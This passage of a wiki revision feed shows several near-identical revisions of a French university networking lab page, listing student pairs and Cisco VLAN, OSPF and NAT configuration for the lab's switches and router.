|-&lt;br /&gt;
| SDSL&lt;br /&gt;
| Cuivre&lt;br /&gt;
| N/A&lt;br /&gt;
| N/A&lt;br /&gt;
| N/A&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
=== Paramétrage des VLANs ===&lt;br /&gt;
&lt;br /&gt;
'''6509-E'''&lt;br /&gt;
&lt;br /&gt;
 enable&lt;br /&gt;
 conf t&lt;br /&gt;
 vlan 131&lt;br /&gt;
 name Internet&lt;br /&gt;
 exit&lt;br /&gt;
 int vlan 131&lt;br /&gt;
 ip address 192.168.222.12 255.255.255.248&lt;br /&gt;
 exit&lt;br /&gt;
 int te6/4&lt;br /&gt;
 switchport mode access&lt;br /&gt;
 switchport access vlan 131&lt;br /&gt;
 exit&lt;br /&gt;
 exit&lt;br /&gt;
 write&lt;br /&gt;
&lt;br /&gt;
'''9200'''&lt;br /&gt;
&lt;br /&gt;
 [Parametrage Vlan fait]&lt;br /&gt;
&lt;br /&gt;
=== Paramétrage de l'OSPF ===&lt;br /&gt;
&lt;br /&gt;
'''6509-E'''&lt;br /&gt;
&lt;br /&gt;
 router ospf 1                                          # un numéro de processus                                                                                                         &lt;br /&gt;
  router-id 10.60.0.1                                   # un id pour le routeur (plus petite adresse disponible)&lt;br /&gt;
  log-adjacency-changes                                                                                  &lt;br /&gt;
  summary-address 193.48.57.176 255.255.255.240         # adresse que l'on souhaite diffuser aux voisins (addresse du VLAN 333)                                                                                                            &lt;br /&gt;
  summary-address 100.64.0.0 255.240.0.0 not-advertise   # address q'on veut pas diffuser (celle du reseau privé)&lt;br /&gt;
  summary-address 10.0.0.0 255.0.0.0 not-advertise      # address q'on veut pas diffuser (?)                                                                                                             &lt;br /&gt;
  redistribute connected subnets                        # autorise la diffusion pour les nouveaux réseaux qui peuvent être connectés   &lt;br /&gt;
  redistribute static subnets route-map ospf                                                                                                                            &lt;br /&gt;
  network 192.168.222.8 0.0.0.7 area 2                  # domaine de diffusion OSPF&lt;br /&gt;
&lt;br /&gt;
'''9200'''&lt;br /&gt;
&lt;br /&gt;
 router ospf 1                                                                                                                                    &lt;br /&gt;
  router-id 10.60.0.2                                   # on change simplement l'id du routeur par rapport au 6509-E&lt;br /&gt;
  log-adjacency-changes                                                                                  &lt;br /&gt;
  summary-address 193.48.57.176 255.255.255.240                                                                                                         &lt;br /&gt;
  summary-address 100.64.0.0 255.240.0.0 not-advertise  &lt;br /&gt;
  summary-address 10.0.0.0 255.0.0.0 not-advertise                                                                                                    &lt;br /&gt;
  redistribute connected subnets                       &lt;br /&gt;
  redistribute static subnets route-map ospf                                                                                                                            &lt;br /&gt;
  network 192.168.222.8 0.0.0.7 area 2&lt;br /&gt;
&lt;br /&gt;
=== Paramétrage NAT ===&lt;br /&gt;
&lt;br /&gt;
L'objectif du NAT est de faire la translation ip_privee&amp;lt;-&amp;gt;ip_publique entre les VM et l'extérieur&lt;br /&gt;
&lt;br /&gt;
'''6509-E'''&lt;br /&gt;
&lt;br /&gt;
[A COMPLETER]&lt;br /&gt;
&lt;br /&gt;
    enable&lt;br /&gt;
    configure terminal&lt;br /&gt;
    ip nat inside source static local-ip global-ip&lt;br /&gt;
    interface type number&lt;br /&gt;
    ip address ip-address mask [secondary]&lt;br /&gt;
    ip nat inside&lt;br /&gt;
    exit&lt;br /&gt;
    interface type number&lt;br /&gt;
    ip address ip-address mask [secondary]&lt;br /&gt;
    ip nat outside&lt;br /&gt;
    end&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''9200'''&lt;/div&gt;</summary>
		<author><name>Ccalleri</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021&amp;diff=52737</id>
		<title>TP sysres IMA5sc 2020/2021</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021&amp;diff=52737"/>
				<updated>2020-10-15T08:30:35Z</updated>
		
		<summary type="html">&lt;p&gt;Ccalleri : /* Paramétrage NAT */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Répartition des binômes ==&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Cahier !! Elèves &lt;br /&gt;
|-&lt;br /&gt;
| [[ TP sysres IMA5sc 2020/2021 G1 | Cahier groupe n°1]]&lt;br /&gt;
| GURY Evan &amp;amp; DUBOIS Vincent&lt;br /&gt;
|-&lt;br /&gt;
| [[ TP sysres IMA5sc 2020/2021 G2 | Cahier groupe n°2]]&lt;br /&gt;
| BARGIBANT Quentin &amp;amp; LAGNEAU Alex&lt;br /&gt;
|-&lt;br /&gt;
| [[ TP sysres IMA5sc 2020/2021 G3 | Cahier groupe n°3]]&lt;br /&gt;
| SIMONIN Richard &amp;amp; MERTZ Thomas&lt;br /&gt;
|-&lt;br /&gt;
| [[ TP sysres IMA5sc 2020/2021 G4 | Cahier groupe n°4]]&lt;br /&gt;
| BENAYED Samuel &amp;amp; EVRARD Théo&lt;br /&gt;
|-&lt;br /&gt;
| [[ TP sysres IMA5sc 2020/2021 G5 | Cahier groupe n°5]]&lt;br /&gt;
| RINGOT Loïc &amp;amp; SANCHEZ Pierre&lt;br /&gt;
|-&lt;br /&gt;
| [[ TP sysres IMA5sc 2020/2021 G6 | Cahier groupe n°6]]&lt;br /&gt;
| NDUWAMUNGU Jean De Dieu &amp;amp; MOINAT Théau&lt;br /&gt;
|-&lt;br /&gt;
| [[ TP sysres IMA5sc 2020/2021 G7 | Cahier groupe n°7]]&lt;br /&gt;
| EKHLAS EID Nour &amp;amp; BISALLI Clara&lt;br /&gt;
|-&lt;br /&gt;
| [[ TP sysres IMA5sc 2020/2021 G8 | Cahier groupe n°8]]&lt;br /&gt;
| SOULAIMANI Jawad &amp;amp; TEKIN Kadir&lt;br /&gt;
|-&lt;br /&gt;
| [[ TP sysres IMA5sc 2020/2021 G9 | Cahier groupe n°9]]&lt;br /&gt;
| VIEUBLED Tanguy &amp;amp; VERNIER Paul&lt;br /&gt;
|-&lt;br /&gt;
| [[ TP sysres IMA5sc 2020/2021 G10 | Cahier groupe n°10]]&lt;br /&gt;
| MALTI Hind &amp;amp; AHOUASSOU Loris&lt;br /&gt;
|-&lt;br /&gt;
| [[ TP sysres IMA5sc 2020/2021 G11 | Cahier groupe n°11]]&lt;br /&gt;
| DARDENNE Sébastien &amp;amp; CALLERISA Corto&lt;br /&gt;
|-&lt;br /&gt;
| [[ TP sysres IMA5sc 2020/2021 G12 | Cahier groupe n°12]]&lt;br /&gt;
| NORMAND Quentin &amp;amp; CLAUDEL Maxime&lt;br /&gt;
|-&lt;br /&gt;
| [[ TP sysres IMA5sc 2020/2021 G13 | Cahier groupe n°13]]&lt;br /&gt;
| NOM Prénom &amp;amp; NOM Prénom&lt;br /&gt;
|-&lt;br /&gt;
| [[ TP sysres IMA5sc 2020/2021 G14 | Cahier groupe n°14]]&lt;br /&gt;
| FAUCHOIS Lukas &amp;amp; ROUILLÉ Guillaume&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
== Installation du réseau ==&lt;br /&gt;
&lt;br /&gt;
=== Branchement du matériel ===&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Global_scheme_PRA_2020.png|600px|center|Schéma de câblage]]&lt;br /&gt;
&lt;br /&gt;
=== Connexions entre équipements ===&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! !! Type !! Port !! VLAN !! IP&lt;br /&gt;
|-&lt;br /&gt;
| 6509-E&lt;br /&gt;
| Fibre 10G&lt;br /&gt;
| Te5/4&lt;br /&gt;
| XXX&lt;br /&gt;
| YYY.YYY.YYY.YYY&lt;br /&gt;
|-&lt;br /&gt;
| 9200&lt;br /&gt;
| Fibre 10G&lt;br /&gt;
| Te1/1/1&lt;br /&gt;
| XXX&lt;br /&gt;
| YYY.YYY.YYY.YYY&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! !! Type !! Port !! VLAN !! IP&lt;br /&gt;
|-&lt;br /&gt;
| 6509-E&lt;br /&gt;
| Fibre 10G&lt;br /&gt;
| Te6/5&lt;br /&gt;
| XXX&lt;br /&gt;
| YYY.YYY.YYY.YYY&lt;br /&gt;
|-&lt;br /&gt;
| ISR 4331&lt;br /&gt;
| Fibre 10G&lt;br /&gt;
| AAA&lt;br /&gt;
| XXX&lt;br /&gt;
| YYY.YYY.YYY.YYY&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! !! Type !! Port !! VLAN !! IP&lt;br /&gt;
|-&lt;br /&gt;
| 6509-E&lt;br /&gt;
| Fibre 10G&lt;br /&gt;
| Te5/5&lt;br /&gt;
| 333&lt;br /&gt;
| 100.64.0.5/24&lt;br /&gt;
|-&lt;br /&gt;
| CAPBRETON&lt;br /&gt;
| Fibre 10G&lt;br /&gt;
| Eth5&lt;br /&gt;
| N/A&lt;br /&gt;
| N/A&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! !! Type !! Port !! VLAN !! IP&lt;br /&gt;
|-&lt;br /&gt;
| 6509-E&lt;br /&gt;
| Fibre 10G&lt;br /&gt;
| Te6/4&lt;br /&gt;
| 131&lt;br /&gt;
| 192.168.222.12/29&lt;br /&gt;
|-&lt;br /&gt;
| ECOLE&lt;br /&gt;
| Fibre 10G&lt;br /&gt;
| N/A&lt;br /&gt;
| N/A&lt;br /&gt;
| N/A&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! !! Type !! Port !! VLAN !! IP&lt;br /&gt;
|-&lt;br /&gt;
| 9200&lt;br /&gt;
| Fibre 1G&lt;br /&gt;
| Te1/1/3&lt;br /&gt;
| 333&lt;br /&gt;
| 100.64.0.6/24&lt;br /&gt;
|-&lt;br /&gt;
| CAPBRETON&lt;br /&gt;
| Cuivre&lt;br /&gt;
| Eth4&lt;br /&gt;
| N/A&lt;br /&gt;
| N/A&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! !! Type !! Port !! VLAN !! IP&lt;br /&gt;
|-&lt;br /&gt;
| 9200&lt;br /&gt;
| Cuivre&lt;br /&gt;
| Te5/4&lt;br /&gt;
| XXX&lt;br /&gt;
| YYY.YYY.YYY.YYY&lt;br /&gt;
|-&lt;br /&gt;
| ISR 4331&lt;br /&gt;
| Cuivre&lt;br /&gt;
| AAA&lt;br /&gt;
| XXX&lt;br /&gt;
| YYY.YYY.YYY.YYY&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! !! Type !! Port !! VLAN !! IP&lt;br /&gt;
|-&lt;br /&gt;
| 9200&lt;br /&gt;
| Fibre 10G&lt;br /&gt;
| Gi1/0/1&lt;br /&gt;
| 131&lt;br /&gt;
| 192.168.222.13/29&lt;br /&gt;
|-&lt;br /&gt;
| ECOLE&lt;br /&gt;
| Fibre 10G&lt;br /&gt;
| N/A&lt;br /&gt;
| N/A&lt;br /&gt;
| N/A&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! !! Type !! Port !! VLAN !! IP&lt;br /&gt;
|-&lt;br /&gt;
| ISR 4331&lt;br /&gt;
| Cuivre&lt;br /&gt;
| Gi1/0/2&lt;br /&gt;
| XXX&lt;br /&gt;
| YYY.YYY.YYY.YYY&lt;br /&gt;
|-&lt;br /&gt;
| SDSL&lt;br /&gt;
| Cuivre&lt;br /&gt;
| N/A&lt;br /&gt;
| N/A&lt;br /&gt;
| N/A&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
=== Paramétrage des VLANs ===&lt;br /&gt;
&lt;br /&gt;
'''6509-E'''&lt;br /&gt;
&lt;br /&gt;
 enable&lt;br /&gt;
 conf t&lt;br /&gt;
 vlan 131&lt;br /&gt;
 name Internet&lt;br /&gt;
 exit&lt;br /&gt;
 int vlan 131&lt;br /&gt;
 ip address 192.168.222.12 255.255.255.248&lt;br /&gt;
 exit&lt;br /&gt;
 int te6/4&lt;br /&gt;
 switchport mode access&lt;br /&gt;
 switchport access vlan 131&lt;br /&gt;
 exit&lt;br /&gt;
 exit&lt;br /&gt;
 write&lt;br /&gt;
&lt;br /&gt;
'''9200'''&lt;br /&gt;
&lt;br /&gt;
 [Parametrage Vlan fait]&lt;br /&gt;
&lt;br /&gt;
=== Paramétrage de l'OSPF ===&lt;br /&gt;
&lt;br /&gt;
'''6509-E'''&lt;br /&gt;
&lt;br /&gt;
 router ospf 1                                          # un numéro de processus                                                                                                         &lt;br /&gt;
  router-id 10.60.0.1                                   # un id pour le routeur (plus petite adresse disponible)&lt;br /&gt;
  log-adjacency-changes                                                                                  &lt;br /&gt;
  summary-address 193.48.57.176 255.255.255.240         # adresse que l'on souhaite diffuser aux voisins (addresse du VLAN 333)                                                                                                            &lt;br /&gt;
  summary-address 100.60.0.0 255.240.0.0 not-advertise   # address q'on veut pas diffuser (celle du reseau privé)&lt;br /&gt;
  summary-address 10.0.0.0 255.0.0.0 not-advertise      # address q'on veut pas diffuser (?)                                                                                                             &lt;br /&gt;
  redistribute connected subnets                        # autorise la diffusion pour les nouveaux réseaux qui peuvent être connectés   &lt;br /&gt;
  redistribute static subnets route-map ospf                                                                                                                            &lt;br /&gt;
  network 192.168.222.8 0.0.0.7 area 2                  # domaine de diffusion OSPF&lt;br /&gt;
&lt;br /&gt;
'''9200'''&lt;br /&gt;
&lt;br /&gt;
 router ospf 1                                                                                                                                    &lt;br /&gt;
  router-id 10.60.0.2                                   # on change simplement l'id du routeur par rapport au 6509-E&lt;br /&gt;
  log-adjacency-changes                                                                                  &lt;br /&gt;
  summary-address 193.48.57.176 255.255.255.240                                                                                                         &lt;br /&gt;
  summary-address 100.60.0.0 255.240.0.0 not-advertise  &lt;br /&gt;
  summary-address 10.0.0.0 255.0.0.0 not-advertise                                                                                                    &lt;br /&gt;
  redistribute connected subnets                       &lt;br /&gt;
  redistribute static subnets route-map ospf                                                                                                                            &lt;br /&gt;
  network 192.168.222.8 0.0.0.7 area 2&lt;br /&gt;
&lt;br /&gt;
=== Paramétrage NAT ===&lt;br /&gt;
&lt;br /&gt;
L'objectif du NAT est de faire la translation ip_privee&amp;lt;-&amp;gt;ip_publique entre les VM et l'extérieur&lt;br /&gt;
&lt;br /&gt;
'''6509-E'''&lt;br /&gt;
&lt;br /&gt;
[A COMPLETER]&lt;br /&gt;
&lt;br /&gt;
    enable&lt;br /&gt;
    configure terminal&lt;br /&gt;
    ip nat inside source static local-ip global-ip&lt;br /&gt;
    interface type number&lt;br /&gt;
    ip address ip-address mask [secondary]&lt;br /&gt;
    ip nat inside&lt;br /&gt;
    exit&lt;br /&gt;
    interface type number&lt;br /&gt;
    ip address ip-address mask [secondary]&lt;br /&gt;
    ip nat outside&lt;br /&gt;
    end&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''9200'''&lt;/div&gt;</summary>
		<author><name>Ccalleri</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021&amp;diff=52736</id>
		<title>TP sysres IMA5sc 2020/2021</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021&amp;diff=52736"/>
				<updated>2020-10-15T08:30:21Z</updated>
		
		<summary type="html">&lt;p&gt;Ccalleri : /* Paramétrage NAT */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Répartition des binômes ==&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Cahier !! Elèves &lt;br /&gt;
|-&lt;br /&gt;
| [[ TP sysres IMA5sc 2020/2021 G1 | Cahier groupe n°1]]&lt;br /&gt;
| GURY Evan &amp;amp; DUBOIS Vincent&lt;br /&gt;
|-&lt;br /&gt;
| [[ TP sysres IMA5sc 2020/2021 G2 | Cahier groupe n°2]]&lt;br /&gt;
| BARGIBANT Quentin &amp;amp; LAGNEAU Alex&lt;br /&gt;
|-&lt;br /&gt;
| [[ TP sysres IMA5sc 2020/2021 G3 | Cahier groupe n°3]]&lt;br /&gt;
| SIMONIN Richard &amp;amp; MERTZ Thomas&lt;br /&gt;
|-&lt;br /&gt;
| [[ TP sysres IMA5sc 2020/2021 G4 | Cahier groupe n°4]]&lt;br /&gt;
| BENAYED Samuel &amp;amp; EVRARD Théo&lt;br /&gt;
|-&lt;br /&gt;
| [[ TP sysres IMA5sc 2020/2021 G5 | Cahier groupe n°5]]&lt;br /&gt;
| RINGOT Loïc &amp;amp; SANCHEZ Pierre&lt;br /&gt;
|-&lt;br /&gt;
| [[ TP sysres IMA5sc 2020/2021 G6 | Cahier groupe n°6]]&lt;br /&gt;
| NDUWAMUNGU Jean De Dieu &amp;amp; MOINAT Théau&lt;br /&gt;
|-&lt;br /&gt;
| [[ TP sysres IMA5sc 2020/2021 G7 | Cahier groupe n°7]]&lt;br /&gt;
| EKHLAS EID Nour &amp;amp; BISALLI Clara&lt;br /&gt;
|-&lt;br /&gt;
| [[ TP sysres IMA5sc 2020/2021 G8 | Cahier groupe n°8]]&lt;br /&gt;
| SOULAIMANI Jawad &amp;amp; TEKIN Kadir&lt;br /&gt;
|-&lt;br /&gt;
| [[ TP sysres IMA5sc 2020/2021 G9 | Cahier groupe n°9]]&lt;br /&gt;
| VIEUBLED Tanguy &amp;amp; VERNIER Paul&lt;br /&gt;
|-&lt;br /&gt;
| [[ TP sysres IMA5sc 2020/2021 G10 | Cahier groupe n°10]]&lt;br /&gt;
| MALTI Hind &amp;amp; AHOUASSOU Loris&lt;br /&gt;
|-&lt;br /&gt;
| [[ TP sysres IMA5sc 2020/2021 G11 | Cahier groupe n°11]]&lt;br /&gt;
| DARDENNE Sébastien &amp;amp; CALLERISA Corto&lt;br /&gt;
|-&lt;br /&gt;
| [[ TP sysres IMA5sc 2020/2021 G12 | Cahier groupe n°12]]&lt;br /&gt;
| NORMAND Quentin &amp;amp; CLAUDEL Maxime&lt;br /&gt;
|-&lt;br /&gt;
| [[ TP sysres IMA5sc 2020/2021 G13 | Cahier groupe n°13]]&lt;br /&gt;
| NOM Prénom &amp;amp; NOM Prénom&lt;br /&gt;
|-&lt;br /&gt;
| [[ TP sysres IMA5sc 2020/2021 G14 | Cahier groupe n°14]]&lt;br /&gt;
| FAUCHOIS Lukas &amp;amp; ROUILLÉ Guillaume&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
== Installation du réseau ==&lt;br /&gt;
&lt;br /&gt;
=== Branchement du matériel ===&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Global_scheme_PRA_2020.png|600px|center|Schéma de câblage]]&lt;br /&gt;
&lt;br /&gt;
=== Connexions entre équipements ===&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! !! Type !! Port !! VLAN !! IP&lt;br /&gt;
|-&lt;br /&gt;
| 6509-E&lt;br /&gt;
| Fibre 10G&lt;br /&gt;
| Te5/4&lt;br /&gt;
| XXX&lt;br /&gt;
| YYY.YYY.YYY.YYY&lt;br /&gt;
|-&lt;br /&gt;
| 9200&lt;br /&gt;
| Fibre 10G&lt;br /&gt;
| Te1/1/1&lt;br /&gt;
| XXX&lt;br /&gt;
| YYY.YYY.YYY.YYY&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! !! Type !! Port !! VLAN !! IP&lt;br /&gt;
|-&lt;br /&gt;
| 6509-E&lt;br /&gt;
| Fibre 10G&lt;br /&gt;
| Te6/5&lt;br /&gt;
| XXX&lt;br /&gt;
| YYY.YYY.YYY.YYY&lt;br /&gt;
|-&lt;br /&gt;
| ISR 4331&lt;br /&gt;
| Fibre 10G&lt;br /&gt;
| AAA&lt;br /&gt;
| XXX&lt;br /&gt;
| YYY.YYY.YYY.YYY&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! !! Type !! Port !! VLAN !! IP&lt;br /&gt;
|-&lt;br /&gt;
| 6509-E&lt;br /&gt;
| Fibre 10G&lt;br /&gt;
| Te5/5&lt;br /&gt;
| 333&lt;br /&gt;
| 100.64.0.5/24&lt;br /&gt;
|-&lt;br /&gt;
| CAPBRETON&lt;br /&gt;
| Fibre 10G&lt;br /&gt;
| Eth5&lt;br /&gt;
| N/A&lt;br /&gt;
| N/A&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! !! Type !! Port !! VLAN !! IP&lt;br /&gt;
|-&lt;br /&gt;
| 6509-E&lt;br /&gt;
| Fibre 10G&lt;br /&gt;
| Te6/4&lt;br /&gt;
| 131&lt;br /&gt;
| 192.168.222.12/29&lt;br /&gt;
|-&lt;br /&gt;
| ECOLE&lt;br /&gt;
| Fibre 10G&lt;br /&gt;
| N/A&lt;br /&gt;
| N/A&lt;br /&gt;
| N/A&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! !! Type !! Port !! VLAN !! IP&lt;br /&gt;
|-&lt;br /&gt;
| 9200&lt;br /&gt;
| Fibre 1G&lt;br /&gt;
| Te1/1/3&lt;br /&gt;
| 333&lt;br /&gt;
| 100.64.0.6/24&lt;br /&gt;
|-&lt;br /&gt;
| CAPBRETON&lt;br /&gt;
| Cuivre&lt;br /&gt;
| Eth4&lt;br /&gt;
| N/A&lt;br /&gt;
| N/A&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! !! Type !! Port !! VLAN !! IP&lt;br /&gt;
|-&lt;br /&gt;
| 9200&lt;br /&gt;
| Cuivre&lt;br /&gt;
| Te5/4&lt;br /&gt;
| XXX&lt;br /&gt;
| YYY.YYY.YYY.YYY&lt;br /&gt;
|-&lt;br /&gt;
| ISR 4331&lt;br /&gt;
| Cuivre&lt;br /&gt;
| AAA&lt;br /&gt;
| XXX&lt;br /&gt;
| YYY.YYY.YYY.YYY&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! !! Type !! Port !! VLAN !! IP&lt;br /&gt;
|-&lt;br /&gt;
| 9200&lt;br /&gt;
| Fibre 10G&lt;br /&gt;
| Gi1/0/1&lt;br /&gt;
| 131&lt;br /&gt;
| 192.168.222.13/29&lt;br /&gt;
|-&lt;br /&gt;
| ECOLE&lt;br /&gt;
| Fibre 10G&lt;br /&gt;
| N/A&lt;br /&gt;
| N/A&lt;br /&gt;
| N/A&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! !! Type !! Port !! VLAN !! IP&lt;br /&gt;
|-&lt;br /&gt;
| ISR 4331&lt;br /&gt;
| Cuivre&lt;br /&gt;
| Gi1/0/2&lt;br /&gt;
| XXX&lt;br /&gt;
| YYY.YYY.YYY.YYY&lt;br /&gt;
|-&lt;br /&gt;
| SDSL&lt;br /&gt;
| Cuivre&lt;br /&gt;
| N/A&lt;br /&gt;
| N/A&lt;br /&gt;
| N/A&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
=== Paramétrage des VLANs ===&lt;br /&gt;
&lt;br /&gt;
'''6509-E'''&lt;br /&gt;
&lt;br /&gt;
 enable&lt;br /&gt;
 conf t&lt;br /&gt;
 vlan 131&lt;br /&gt;
 name Internet&lt;br /&gt;
 exit&lt;br /&gt;
 int vlan 131&lt;br /&gt;
 ip address 192.168.222.12 255.255.255.248&lt;br /&gt;
 exit&lt;br /&gt;
 int te6/4&lt;br /&gt;
 switchport mode access&lt;br /&gt;
 switchport access vlan 131&lt;br /&gt;
 exit&lt;br /&gt;
 exit&lt;br /&gt;
 write&lt;br /&gt;
&lt;br /&gt;
'''9200'''&lt;br /&gt;
&lt;br /&gt;
 [Parametrage Vlan fait]&lt;br /&gt;
&lt;br /&gt;
=== Paramétrage de l'OSPF ===&lt;br /&gt;
&lt;br /&gt;
'''6509-E'''&lt;br /&gt;
&lt;br /&gt;
 router ospf 1                                          # un numéro de processus                                                                                                         &lt;br /&gt;
  router-id 10.60.0.1                                   # un id pour le routeur (plus petite adresse disponible)&lt;br /&gt;
  log-adjacency-changes                                                                                  &lt;br /&gt;
  summary-address 193.48.57.176 255.255.255.240         # adresse que l'on souhaite diffuser aux voisins (addresse du VLAN 333)                                                                                                            &lt;br /&gt;
  summary-address 100.60.0.0 255.240.0.0 not-advertise   # address q'on veut pas diffuser (celle du reseau privé)&lt;br /&gt;
  summary-address 10.0.0.0 255.0.0.0 not-advertise      # address q'on veut pas diffuser (?)                                                                                                             &lt;br /&gt;
  redistribute connected subnets                        # autorise la diffusion pour les nouveaux réseaux qui peuvent être connectés   &lt;br /&gt;
  redistribute static subnets route-map ospf                                                                                                                            &lt;br /&gt;
  network 192.168.222.8 0.0.0.7 area 2                  # domaine de diffusion OSPF&lt;br /&gt;
&lt;br /&gt;
'''9200'''&lt;br /&gt;
&lt;br /&gt;
 router ospf 1                                                                                                                                    &lt;br /&gt;
  router-id 10.60.0.2                                   # on change simplement l'id du routeur par rapport au 6509-E&lt;br /&gt;
  log-adjacency-changes                                                                                  &lt;br /&gt;
  summary-address 193.48.57.176 255.255.255.240                                                                                                         &lt;br /&gt;
  summary-address 100.60.0.0 255.240.0.0 not-advertise  &lt;br /&gt;
  summary-address 10.0.0.0 255.0.0.0 not-advertise                                                                                                    &lt;br /&gt;
  redistribute connected subnets                       &lt;br /&gt;
  redistribute static subnets route-map ospf                                                                                                                            &lt;br /&gt;
  network 192.168.222.8 0.0.0.7 area 2&lt;br /&gt;
&lt;br /&gt;
=== Paramétrage NAT ===&lt;br /&gt;
&lt;br /&gt;
L'objectif du NAT est de faire la translation ip_privee&amp;lt;-&amp;gt;ip_publique entre les vm et l'extérieur&lt;br /&gt;
&lt;br /&gt;
'''6509-E'''&lt;br /&gt;
&lt;br /&gt;
[A COMPLETER]&lt;br /&gt;
&lt;br /&gt;
    enable&lt;br /&gt;
    configure terminal&lt;br /&gt;
    ip nat inside source static local-ip global-ip&lt;br /&gt;
    interface type number&lt;br /&gt;
    ip address ip-address mask [secondary]&lt;br /&gt;
    ip nat inside&lt;br /&gt;
    exit&lt;br /&gt;
    interface type number&lt;br /&gt;
    ip address ip-address mask [secondary]&lt;br /&gt;
    ip nat outside&lt;br /&gt;
    end&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''9200'''&lt;/div&gt;</summary>
		<author><name>Ccalleri</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021&amp;diff=52735</id>
		<title>TP sysres IMA5sc 2020/2021</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021&amp;diff=52735"/>
				<updated>2020-10-15T08:27:15Z</updated>
		
		<summary type="html">&lt;p&gt;Ccalleri : /* Paramétrage de l'OSPF */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Répartition des binômes ==&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Cahier !! Elèves &lt;br /&gt;
|-&lt;br /&gt;
| [[ TP sysres IMA5sc 2020/2021 G1 | Cahier groupe n°1]]&lt;br /&gt;
| GURY Evan &amp;amp; DUBOIS Vincent&lt;br /&gt;
|-&lt;br /&gt;
| [[ TP sysres IMA5sc 2020/2021 G2 | Cahier groupe n°2]]&lt;br /&gt;
| BARGIBANT Quentin &amp;amp; LAGNEAU Alex&lt;br /&gt;
|-&lt;br /&gt;
| [[ TP sysres IMA5sc 2020/2021 G3 | Cahier groupe n°3]]&lt;br /&gt;
| SIMONIN Richard &amp;amp; MERTZ Thomas&lt;br /&gt;
|-&lt;br /&gt;
| [[ TP sysres IMA5sc 2020/2021 G4 | Cahier groupe n°4]]&lt;br /&gt;
| BENAYED Samuel &amp;amp; EVRARD Théo&lt;br /&gt;
|-&lt;br /&gt;
| [[ TP sysres IMA5sc 2020/2021 G5 | Cahier groupe n°5]]&lt;br /&gt;
| RINGOT Loïc &amp;amp; SANCHEZ Pierre&lt;br /&gt;
|-&lt;br /&gt;
| [[ TP sysres IMA5sc 2020/2021 G6 | Cahier groupe n°6]]&lt;br /&gt;
| NDUWAMUNGU Jean De Dieu &amp;amp; MOINAT Théau&lt;br /&gt;
|-&lt;br /&gt;
| [[ TP sysres IMA5sc 2020/2021 G7 | Cahier groupe n°7]]&lt;br /&gt;
| EKHLAS EID Nour &amp;amp; BISALLI Clara&lt;br /&gt;
|-&lt;br /&gt;
| [[ TP sysres IMA5sc 2020/2021 G8 | Cahier groupe n°8]]&lt;br /&gt;
| SOULAIMANI Jawad &amp;amp; TEKIN Kadir&lt;br /&gt;
|-&lt;br /&gt;
| [[ TP sysres IMA5sc 2020/2021 G9 | Cahier groupe n°9]]&lt;br /&gt;
